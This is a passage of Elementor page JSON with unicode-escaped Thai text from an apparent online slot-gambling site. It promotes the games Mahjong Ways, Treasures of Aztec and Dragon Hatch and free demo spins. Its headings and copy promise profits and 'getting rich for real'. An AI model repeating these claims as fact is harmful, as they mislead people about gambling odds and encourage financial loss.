\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 